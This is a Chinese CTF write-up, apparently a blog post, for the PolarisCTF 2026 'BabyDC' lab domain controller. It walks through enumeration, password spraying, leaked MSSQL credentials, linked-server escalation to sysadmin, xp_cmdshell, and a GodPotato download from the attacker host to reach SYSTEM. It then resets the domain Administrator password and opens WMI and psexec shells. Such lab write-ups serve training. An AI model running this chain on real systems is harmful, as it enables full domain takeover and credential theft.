脚本做的事情是：

在宿主机开启临时 HTTP 服务。
用 wuwupor / lovlyBaby 登录 MSSQL。
通过 linked server POO_PUBLIC 执行 xp_cmdshell。
向客机投递并运行 GodPotato-NET4.exe。
把 Administrator 的域密码改成已知值。
调用 wmiexec.py 验证 Administrator shell。

运行方式

在当前主机上直接执行：

1
python C:\AI知识库\Test\polarisctf2026\tasks\Web\16-BabyDC\exploit\solve.py

小结

这题的核心链非常清晰：

1
离线盘分析 -> webroot 明文连接串 -> MSSQL 登录 ->
2
linked server 映射到 sa -> xp_cmdshell ->
3
GodPotato(SeImpersonate) -> SYSTEM ->
4
重置 Administrator 密码 -> Administrator shell

其中最关键的两个点是：

poo_connection.txt 泄露了 SQL 凭据。
POO_PUBLIC 这个 linked server 把普通 SQL 登录桥接成了 sa。

有了这两步，后面的 GodPotato 只是把 “系统命令执行” 再抬成 “管理员控制整台 DC”。

GDEX(土豆提权)

1. 题目环境与边界

工具：VirtualBox 7.2.0、PowerShell、ipconfig

目的：确认靶机网络、攻击边界和目标身份，确保后续动作只落在靶机 192.168.56.101 上，不对宿主机做攻击。

关键命令：

ipconfig

关键结果：

宿主机 VirtualBox Host-Only 网卡为 192.168.56.1/24。
靶机最终恢复到 Host-Only 网络，目标地址确定为 192.168.56.101。
靶机身份后续通过 LDAP/SQL 进一步确认：
- 主机名：CASTLEVANIA
- 域名：XMCVE.local
- 系统：Windows Server 2019
- 角色：域控

说明：

整个过程只打 192.168.56.101。
宿主机 192.168.56.1 仅在后期作为 HTTP 文件服务端，给靶机下发工具文件，不作为攻击目标。

2. 初始信息搜集

2.1 Web 探测

工具：web_probe.py

目的：确认 Web 面是否存在可直接利用的入口、虚拟主机、隐藏路径或调试页面。

关键命令：

1
import argparse
2
from typing import Iterable
3

4
import requests
5

6

7
DEFAULT_HOSTS = [
8
    "192.168.56.101",
9
    "castlevania",
10
    "castlevania.xmcve.local",
11
    "xmcve.local",
12
    "portal.xmcve.local",
13
    "intranet.xmcve.local",
14
    "employee.xmcve.local",
15
    "support.xmcve.local",
16
    "sql.xmcve.local",
17
    "dev.xmcve.local",
18
    "test.xmcve.local",
19
]
20

21
DEFAULT_PATHS = [
22
    "/",
23
    "/index.html",
24
    "/portal/",
25
    "/employee/",
26
    "/support/",
27
    "/login/",
28
    "/admin/",
29
    "/db/",
30
    "/sql/",
31
    "/backup/",
32
]
33

34

35
def probe(base_url: str, hostnames: Iterable[str], paths: Iterable[str], timeout: int) -> None:
36
    session = requests.Session()
37
    session.trust_env = False
38
    for host in hostnames:
39
        for path in paths:
40
            url = f"{base_url.rstrip('/')}{path}"
41
            try:
42
                response = session.get(
43
                    url,
44
                    headers={"Host": host},
45
                    timeout=timeout,
46
                    allow_redirects=False,
47
                    proxies={"http": None, "https": None},
48
                )
49
                server = response.headers.get("Server", "")
50
                print(
51
                    f"{response.status_code}\t{len(response.text)}\tHost={host}\tPath={path}\tServer={server}"
52
                )
53
            except Exception as exc:
54
                print(f"ERR\tHost={host}\tPath={path}\t{exc}")
55

56

57
def main() -> None:
58
    parser = argparse.ArgumentParser(description="HTTP vhost and path probing against a single target")
59
    parser.add_argument("--url", default="http://192.168.56.101", help="Base URL")
60
    parser.add_argument("--timeout", type=int, default=4, help="Request timeout")
61
    parser.add_argument("--hosts", nargs="*", default=DEFAULT_HOSTS, help="Host header candidates")
62
    parser.add_argument("--paths", nargs="*", default=DEFAULT_PATHS, help="Paths to probe")
63
    args = parser.parse_args()
64
    probe(args.url, args.hosts, args.paths, args.timeout)
65

66

67
if __name__ == "__main__":
68
    main()

python .\web_probe.py —url http://192.168.56.101↗

关键结果：

80/tcp 为 IIS 10.0。
/ 与 /index.html 返回静态页面，内容为：
- CASTLEVANIA Portal
- Employee Portal
- Under maintenance...
OPTIONS 允许的方法为：OPTIONS, TRACE, GET, HEAD, POST

结论：

Web 面非常薄，没有直接给出认证入口或现成 RCE。
站点更像“占位页面 + 后端另有依赖”，应继续往 IIS 配置、连接串和数据库方向挖。

2.2 LDAP RootDSE 匿名枚举

工具：ldap_rootdse.py

目的：确认域信息、LDAP 命名上下文、DC 身份。

关键命令：

1
$env:PYTHONPATH='f:\aaa\新建文件夹\aaaaaaaaaasentou\.deps'
2
python .\ldap_rootdse.py

关键结果：

1
[+] default_naming_context: ['DC=XMCVE,DC=local']
2
[+] dns_host_name: ['CASTLEVANIA.XMCVE.local']
3
[+] ldap_service_name: ['XMCVE.local:castlevania$@XMCVE.LOCAL']

结论：

目标是 XMCVE.local 域内 DC。
后续所有 LDAP/Kerberos/MSSQL 利用都可以围绕这个域来展开。

2.3 Kerberos 用户枚举

工具：kerb_user_enum.py

目的：枚举有效域用户，确认后续喷洒、凭据猜解和服务账号方向。

关键命令：

1
$env:PYTHONPATH='f:\aaa\新建文件夹\aaaaaaaaaasentou\.deps'
2
python .\kerb_user_enum.py --no-asrep

关键结果：

1
VALID   Administrator   25
2
VALID   Alucard         25
3
VALID   support         25
4
VALID   sqlsvc          25
5
INVALID Guest           18
6
INVALID krbtgt          18

结论：

有效用户至少包括：Administrator、Alucard、support、sqlsvc。
sqlsvc 极像 MSSQL 服务账号，优先级最高。

2.4 低噪声 LDAP 密码喷洒

工具：password_spray_ldap.py

目的：对已经确定的少量有效用户做极小范围喷洒，看看是否存在弱口令复用。

关键命令：

1
$env:PYTHONPATH='f:\aaa\新建文件夹\aaaaaaaaaasentou\.deps'
2
python .\password_spray_ldap.py

关键结果：

对 Alucard / sqlsvc / support / Administrator 的小范围喷洒没有命中。

结论：

该题不走“简单弱口令”路线。
后续更应该关注配置泄露、服务账号、数据库与离线取证。

2.5 初始开放端口结论

工具：端口探测

目的：建立完整攻击面。

关键结果：

53/tcp DNS
80/tcp IIS 10.0
88/tcp Kerberos
135/tcp RPC
139/tcp NetBIOS
389/tcp LDAP
445/tcp SMB
464/tcp Kerberos kpasswd
593/tcp RPC over HTTP
636/tcp LDAPS
1433/tcp MSSQL
9389/tcp AD Web Services
49666/tcp``49667/tcp``49669/tcp``49670/tcp 高位 RPC

结论：

这是一台“域控 + IIS + MSSQL”混合角色机器。
真正可打的重心是 1433/tcp，而不是薄弱的静态 Web 页面。

3. 离线取证与关键线索

工具：VirtualBox 磁盘克隆、Python + dissect.target、LnkParse3

目的：Web 正面几乎没有入口时，直接离线分析系统盘，找明文凭据、服务配置、Recent 痕迹和管理员操作记录。

关键思路：

先对靶机系统盘做克隆，得到 bloodstained_clone.vhd。
用 Python + dissect.target 打开克隆盘，重点查看：
- C:\inetpub\wwwroot
- C:\Program Files\Microsoft SQL Server\...\ERRORLOG
- C:\Scripts
- C:\Users\*\AppData\Roaming\Microsoft\Windows\Recent
- ConsoleHost_history.txt
用 LnkParse3 解析 Recent 目录下的 .lnk，恢复已删除文件曾经存在的路径。

关键发现 1：Web 根目录连接串泄露

文件：C:\inetpub\wwwroot\poo_connection.txt
内容关键信息：

1
server=localhost;
2
user=wuwupor;
3
password=lovlyBaby
4
database=master

结论：

直接拿到 MSSQL 明文凭据 wuwupor / lovlyBaby。
这是整条链路的真正起点。

关键发现 2：SQL 服务账号

从 SQL ERRORLOG 可确认 SQL Server 服务账号为 XMCVE\sqlsvc。

结论：

说明之后 xp_cmdshell 很可能会以 sqlsvc 身份执行系统命令。

关键发现 3：linked server

SQL 内存在两个 linked server：
- POO_CONFIG
- POO_PUBLIC

结论：

这类配置在 CTF 里通常不是装饰，很可能就是从低权限 SQL 登录横向到高权限上下文的关键。

关键发现 4：辅助痕迹

MailBot.ps1 里出现过一组像比赛用户名/密码的字符串：
- pr3d1ct / yuyan_crypto
- p2zhh / p2zhh_web
- aomr / aomr_reverse
- berial / berial_pwn
Recent 和 PowerShell history 指向过一批已删除文件：
- dcsync.sh
- golden_ticket.sh
- SAM.save
- SECURITY.save
- SYSTEM.save
- fix_linked_server.ps1

结论：

这些痕迹说明题目设计方向就是“SQL/AD abuse -> 高权限控制”。
但它们只是辅助线索，不是最终利用点。

4. MSSQL 利用链

工具：invoke_sql_query.ps1、invoke_xpcmd.ps1

目的：用已知 SQL 凭据登录数据库，判断权限边界，利用 linked server 完成 sysadmin 提权，并开启 xp_cmdshell。

4.1 连接 MSSQL 并确认初始权限

关键命令：

& .\invoke_sql_query.ps1 -Query “select @@servername as server_name, SYSTEM_USER as login_name, USER_NAME() as db_user, IS_SRVROLEMEMBER(‘sysadmin’) as is_sysadmin”

关键结果：

当前 SQL 登录为 wuwupor
当前数据库用户最初只是 guest
初始并不是 sysadmin

说明：

这意味着明文连接串本身还不够，需要继续从 SQL 配置里提权。

4.2 枚举 linked server

关键命令：

& .\invoke_sql_query.ps1 -Query “select server_id, name, data_source, is_linked, is_rpc_out_enabled, is_data_access_enabled from sys.servers order by server_id”

关键结果：

POO_CONFIG -> localhost
POO_PUBLIC -> localhost
两者都开启了 RPC OUT，并允许数据访问

结论：

这两个 linked server 可以直接作为横向执行入口测试。

4.3 验证 linked server 执行身份

关键命令：

& .\invoke_sql_query.ps1 -Query “EXEC (‘select @@servername as server_name, SYSTEM_USER as login_name, USER_NAME() as db_user’) AT [POO_PUBLIC]” -ConnectionTimeout 20

关键结果：

1
server_name  login_name  db_user
2
CASTLEVANIA  sa          dbo

补充观察：

POO_CONFIG 执行时只是普通低权限上下文。
真正有价值的是 POO_PUBLIC，它把当前请求映射到了 sa / dbo。

结论：

这里已经找到了从普通 SQL 登录跳到高权限 SQL 上下文的关键跳板。

4.4 把 `wuwupor` 提成 `sysadmin`

关键命令：

& .\invoke_sql_query.ps1 -Query “EXEC (‘EXEC master..sp_addsrvrolemember ”wuwupor”, ”sysadmin''') AT [POO_PUBLIC]” -ConnectionTimeout 20

随后复查：

& .\invoke_sql_query.ps1 -Query “select SYSTEM_USER as login_name, USER_NAME() as db_user, IS_SRVROLEMEMBER(‘sysadmin’) as is_sysadmin” -ConnectionTimeout 20

关键结果：

wuwupor 变为 dbo
IS_SRVROLEMEMBER('sysadmin') = 1

结论：

至此，SQL 低权限登录被稳定提到了 sysadmin。

4.5 开启 `xp_cmdshell` 并验证系统命令上下文

关键命令：

1
& .\invoke_sql_query.ps1 -Query "EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;" -ConnectionTimeout 20
2
& .\invoke_xpcmd.ps1 -Command 'whoami' -ConnectionTimeout 20

关键结果：

xmcve\sqlsvc

结论：

SQL Server 系统命令是以 XMCVE\sqlsvc 身份执行。
这和离线取证得到的 SQL 服务账号完全对上。

5. 从 `sqlsvc` 到 `SYSTEM`

工具：serve_blob_tcp.ps1、invoke_xpcmd.ps1、stage_godpotato.ps1、invoke_godpotato_system.ps1

目的：从 sqlsvc 进一步提到本机 SYSTEM。

为什么选 GodPotato：

whoami /priv 显示 sqlsvc 拥有 SeImpersonatePrivilege
Spooler 服务未运行，所以没有优先走 PrintSpoofer
这类环境更适合直接走 GodPotato

5.1 为什么最终没有采用“源码远程编译”

尝试过的辅助脚本：

stage_godpotato.ps1
invoke_godpotato_system.ps1

尝试思路：

把 GodPotato 源码下发到靶机 %TEMP%\gp
用靶机自带 csc.exe 编译

结果：

靶机编译器较老，编译 GodPotato 源码时报错，例如：

error CS1056: Unexpected character ’$’

结论：

“源码下发 + 靶机本地编译”不是最终稳定方案。
真正稳定的方案是直接下发编译好的二进制。

5.2 用内存 HTTP 服务给靶机下发 GodPotato

工具：serve_blob_tcp.ps1

目的：让宿主机只在内存里代理 GodPotato 二进制，避免文件直接落盘在本机被清理。

关键命令：

powershell -ExecutionPolicy Bypass -File .\serve_blob_tcp.ps1 -Bind 192.168.56.1 -Port 8001

关键结果：

宿主机在 http://192.168.56.1:8001/gp.exe 提供 GodPotato 二进制
靶机可以通过 Host-Only 网络直接下载

5.3 通过 `xp_cmdshell` 下载二进制到靶机

关键命令：

& .\invoke_xpcmd.ps1 -Command ‘powershell -NoProfile -Command “Invoke-WebRequest -UseBasicParsing http://192.168.56.1:8001/gp.exe↗ -OutFile $env:TEMP\svcmon.exe; Get-Item$ env:TEMP\svcmon.exe | Select-Object Name,Length | Format-Table -AutoSize”’ -ConnectionTimeout 20

关键结果：

%TEMP%\svcmon.exe 成功落到靶机
文件长度为 57344 字节

5.4 触发 GodPotato 提权并验证 `SYSTEM`

关键命令：

1
& .\invoke_xpcmd.ps1 -Command '%TEMP%\svcmon.exe -cmd "cmd /c whoami /all > C:\Users\sqlsvc\AppData\Local\Temp\gpwho.txt"' -ConnectionTimeout 20
2
& .\invoke_xpcmd.ps1 -Command 'cmd /c type C:\Users\sqlsvc\AppData\Local\Temp\gpwho.txt' -ConnectionTimeout 20

关键结果：

1
User Name           SID
2
=================== ========
3
nt authority\system S-1-5-18

同时 GodPotato 过程日志里还能看到：

1
[*] CurrentUser: NT AUTHORITY\SYSTEM
2
[*] process start with pid 3896

结论：

sqlsvc 已经被稳定提升为 SYSTEM。

6. 从 `SYSTEM` 到 `Administrator`

工具：invoke_xpcmd.ps1、PowerShell WMI

目的：利用 SYSTEM 权限直接控制域内 Administrator。

6.1 用 `SYSTEM` 重置域内 `Administrator` 密码

关键命令：

1
& .\invoke_xpcmd.ps1 -Command '%TEMP%\svcmon.exe -cmd "cmd /c net user Administrator Xmcve#2026! /domain > C:\Users\sqlsvc\AppData\Local\Temp\setadmin.txt 2>&1"' -ConnectionTimeout 20
2
& .\invoke_xpcmd.ps1 -Command 'cmd /c type C:\Users\sqlsvc\AppData\Local\Temp\setadmin.txt' -ConnectionTimeout 20

关键结果：

The command completed successfully.

结论：

域内 Administrator 密码已经被成功改为 Xmcve#2026!。

6.2 用 WMI 验证管理员上下文

目的：证明这组新凭据真的能以管理员身份在远端创建进程，而不是只停留在“理论上应当可用”。

关键命令：

1
$sec = ConvertTo-SecureString 'Xmcve#2026!' -AsPlainText -Force
2
$cred = New-Object System.Management.Automation.PSCredential('XMCVE\Administrator', $sec)
3
Invoke-WmiMethod -Class Win32_Process -Name Create -ArgumentList 'cmd.exe /c whoami > C:\inetpub\wwwroot\adminshell.txt' -ComputerName 192.168.56.101 -Credential $cred
4
(Invoke-WebRequest -UseBasicParsing -Uri 'http://192.168.56.101/adminshell.txt').Content

关键结果：

xmcve\administrator

结论：

这里已经拿到了经过现场验证的 Administrator 远程命令执行。
这一步本身就已经足以证明管理员权限被完全接管。

7. 最终交互 shell 落地

工具：Impacket psexec.py

目的：把已经验证可用的 Administrator 凭据落成真正交互 shell。

前提：

已知管理员凭据：XMCVE\Administrator / Xmcve#2026!
目标 445/tcp 开放
前面已经通过 WMI 验证过该管理员凭据真实有效

关键命令：

psexec.py XMCVE/Administrator:‘Xmcve#2026!’@192.168.56.101 cmd.exe

说明：

这一步就是把“已验证的 Administrator 远程命令执行”进一步落成交互式 shell。
如果提交时更强调“已现场证明”，那么上一节的 adminshell.txt -> xmcve\administrator 已经是强证据。
如果提交时更强调“完整 shell 终点”，则这一条 psexec.py 就是最后一步。

8. 总结与漏洞点

整条利用链可以概括为：

Web 面本身很薄，但离线分析 Web 根目录发现数据库连接串泄露，直接拿到 MSSQL 明文凭据 wuwupor / lovlyBaby。
用该凭据登录 MSSQL 后发现 linked server POO_PUBLIC 映射到了 sa / dbo，从而把 wuwupor 横向提到 sysadmin。
开启 xp_cmdshell 后，系统命令以 XMCVE\sqlsvc 身份执行。
sqlsvc 拥有 SeImpersonatePrivilege，借助 GodPotato 直接提到 NT AUTHORITY\SYSTEM。
以 SYSTEM 重置域内 Administrator 密码，再用新密码完成管理员远程命令执行与最终交互 shell 落地。

最终漏洞点有三处：

漏洞点 1：Web 根目录泄露 SQL 明文连接凭据

C:\inetpub\wwwroot\poo_connection.txt
暴露了 wuwupor / lovlyBaby

漏洞点 2：MSSQL linked server `POO_PUBLIC` 映射到 `sa`

低权限 SQL 登录可以通过 linked server 直接在远端以上下文 sa / dbo 执行语句
最终导致 sysadmin 提权

漏洞点 3：SQL 服务账号 `sqlsvc` 拥有 `SeImpersonatePrivilege`

xp_cmdshell 落地为 sqlsvc
sqlsvc 可借 GodPotato 提权为 SYSTEM
SYSTEM 可直接控制域内 Administrator

至此，完整链路为：

1
信息搜集
2
-> 离线取证拿到 SQL 连接串
3
-> MSSQL 登录
4
-> linked server 映射到 sa
5
-> 提升 wuwupor 为 sysadmin
6
-> 开启 xp_cmdshell
7
-> 命令执行落到 sqlsvc
8
-> GodPotato 提到 SYSTEM
9
-> SYSTEM 重置 Administrator 密码
10
-> Administrator 远程命令执行
11
-> psexec.py 落交互 shell

Thanks for reading!

PolarisCTF-BabyDC(Unexpected)

Mon Mar 30 2026

10907 words · 39 minutes

Documentation CTF CTF Windows Machine Enumeration Active Directory Password Attacks Privilege Escalation Credential Dumping Competition Kerberos Lateral Movement RCE Exploit Development Persistence

PolarisCTF-BabyDC(Unexpected)

Wh1teSu（域用户-弱口令）

结论

目标信息

1. 用户枚举与口令喷洒

2. BloodHound 找真正突破口

3. AS-REP Roast 拿下 mowen

4. 用 mowen 做资产验证

5. GitHub MCP 确认 Backup Operators 利用法

6. 让域控反向备份注册表 hive 到 Kali

7. 离线提取机器账户哈希

8. 用机器账户做 DCSync 拿 Administrator

9. PTH 获取 Administrator shell

最终利用链复盘

关键命令汇总

Lkin（本地挂载）

解题思路

解题过程

1. 挂载硬盘并提取 NTDS 数据库

2. 离线提取域用户 Hash

3. 确定靶机 IP

4. Pass-the-Hash 攻击

5. 权限确认

攻击链

最终权限

本地

域内

NikoCat（Zerologon）

端口扫描

IIS

MSSQL

域内用户

Msfconsole

Zerologon

onehang （Zerologon）

信息收集

端口扫描

添加 hosts 并查看网站

枚举

SMB匿名枚举

LDAP匿名枚举

Web 目录爆破

枚举域用户

mssql 弱口令

枚举Kerberos用户

AS-REP Roasting

Zerologon

hash dump

hash login

psexec

wmiexec

Skywalker_Han（Zerologon）

kerbrute

端口扫描

timeroast-时钟烘焙

zerologon

secretsdump

nxc

psexec

ai幻神之力（本地挂载）

详细复现过程

1. 本地搭建

2. 在线确认与离线取证

3. 离线导出域控凭据

4. 拿管理员 shell

5. 一键脚本说明

一键可复现代码

相关附件

artifacts_system_hostname.txt

artifacts_system_whoami.txt

artifacts_secretsdump.txt

最终答案

平台漏洞（？？？）

漏洞描述

漏洞发现

漏洞复现

scdyh（Zerologon）

端口扫描

Kerberos 用户枚举

反弹shell

lpppp（域用户-弱口令）